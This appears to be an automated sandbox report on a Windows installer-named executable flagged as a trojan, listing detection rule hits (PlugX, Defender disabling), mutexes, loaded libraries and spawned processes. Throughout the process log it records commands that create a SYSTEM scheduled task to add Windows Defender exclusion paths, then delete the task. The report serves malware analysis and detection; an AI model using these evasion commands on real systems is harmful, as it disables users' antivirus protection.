Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000000.1680912265.0000000140015000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: C:\$WINDOWS.~BT\Sources\appraiserres.old\setup-original.exebad allocation.\FilePublic.cpp.\FileInfo.cpp\VarFileInfo\Translation\StringFileInfo\%08lx\FileVersion\StringFileInfo\%08lx\FileDescription\StringFileInfo\%08lx\LegalCopyright\StringFileInfo\%08lx\ProductName\StringFileInfo\%08lx\ProductVersion\StringFileInfo\%08lx\InternalName\StringFileInfo\%08lx\OriginalFilename\StringFileInfo\%08lx\CompanyNameLog.dllCreateLog vs T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000000.1680952516.000000014002A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameBypassWin11Check.exe@ vs T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Binary or memory string: C:\$WINDOWS.~BT\Sources\appraiserres.old\setup-original.exebad allocation.\FilePublic.cpp.\FileInfo.cpp\VarFileInfo\Translation\StringFileInfo\%08lx\FileVersion\StringFileInfo\%08lx\FileDescription\StringFileInfo\%08lx\LegalCopyright\StringFileInfo\%08lx\ProductName\StringFileInfo\%08lx\ProductVersion\StringFileInfo\%08lx\InternalName\StringFileInfo\%08lx\OriginalFilename\StringFileInfo\%08lx\CompanyNameLog.dllCreateLog vs T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Binary or memory string: OriginalFilenameBypassWin11Check.exe@ vs T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f

Source: 4.2.WchJz1.exe.27e0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 39.2.mm3ujg.exe.2d20000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: Process Memory Space: mm3ujg.exe PID: 2688, type: MEMORYSTR	Matched rule: PlugXStrings author = Seth Hardy, description = PlugX Identifying Strings, last_modified = 2014-06-12

Source: 189atohci.sys.0.dr	Binary string: \Device\Driver\
Source: 189atohci.sys.0.dr	Binary string: \Device\TrueSight

Source: classification engine

Classification label: mal100.troj.evad.winEXE@66/30@6/3

Source: C:\Users\user\Documents\WchJz1.exe

Code function: 4_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,

4_2_0000000140003F80

Source: C:\Users\user\Documents\WchJz1.exe

Code function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,

4_2_0000000140001430

Source: C:\Users\user\Documents\WchJz1.exe

4_2_0000000140001520

Source: C:\Users\user\Documents\WchJz1.exe

4_2_0000000140001520

Source: C:\Users\user\Documents\WchJz1.exe

File created: C:\Program Files (x86)\mm3ujg

Jump to behavior

Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\i[1].dat

Jump to behavior

Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\IEToolbarUninstaller
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:600:120:WilError_03
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Mutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Mutant created: \Sessions\1\BaseNamedObjects\8.212.102.187:9000:Sauron
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Mutant created: \Sessions\1\BaseNamedObjects\{4E062DDA-444A-A2A8-84CE-E105F66A5AB3}
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Mutant created: \Sessions\1\BaseNamedObjects\aefd_642294
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:480:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2708:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5232:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3796:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4924:120:WilError_03
Source: C:\Users\user\Documents\WchJz1.exe	Mutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Mutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5496:120:WilError_03

Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Command line argument: tbcore3.dll	41_2_008E1000
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Command line argument: tbcore3.dll	41_2_008E1000
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Command line argument: tbcore3U.dll	41_2_008E1000
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Command line argument: tbcore3U.dll	41_2_008E1000

Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Documents\WchJz1.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

ReversingLabs: Detection: 18%

Source: mm3ujg.exe	String found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
Source: mm3ujg.exe	String found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
Source: mm3ujg.exe	String found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
Source: mm3ujg.exe	String found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
Source: mm3ujg.exe	String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
Source: mm3ujg.exe	String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t

Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

File read: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe "C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe"
Source: unknown	Process created: C:\Users\user\Documents\WchJz1.exe C:\Users\user\Documents\WchJz1.exe
Source: unknown	Process created: C:\Users\user\Documents\WchJz1.exe C:\Users\user\Documents\WchJz1.exe
Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Program Files (x86)\mm3ujg\mm3ujg.exe "C:\Program Files (x86)\mm3ujg\mm3ujg.exe"
Source: unknown	Process created: C:\Program Files (x86)\mm3ujg\mm3ujg.exe "C:\Program Files (x86)\mm3ujg\mm3ujg.exe"
Source: unknown	Process created: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe "C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe"
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\mm3ujg\mm3ujg.exe "C:\Program Files (x86)\mm3ujg\mm3ujg.exe"
Source: unknown	Process created: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe "C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe"
Source: unknown	Process created: C:\Program Files (x86)\mm3ujg\mm3ujg.exe "C:\Program Files (x86)\mm3ujg\mm3ujg.exe"
Source: unknown	Process created: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe "C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe"
Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Program Files (x86)\mm3ujg\mm3ujg.exe "C:\Program Files (x86)\mm3ujg\mm3ujg.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini	Jump to behavior

Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: pid.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: hid.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Section loaded: iphlpapi.dll	Jump to behavior
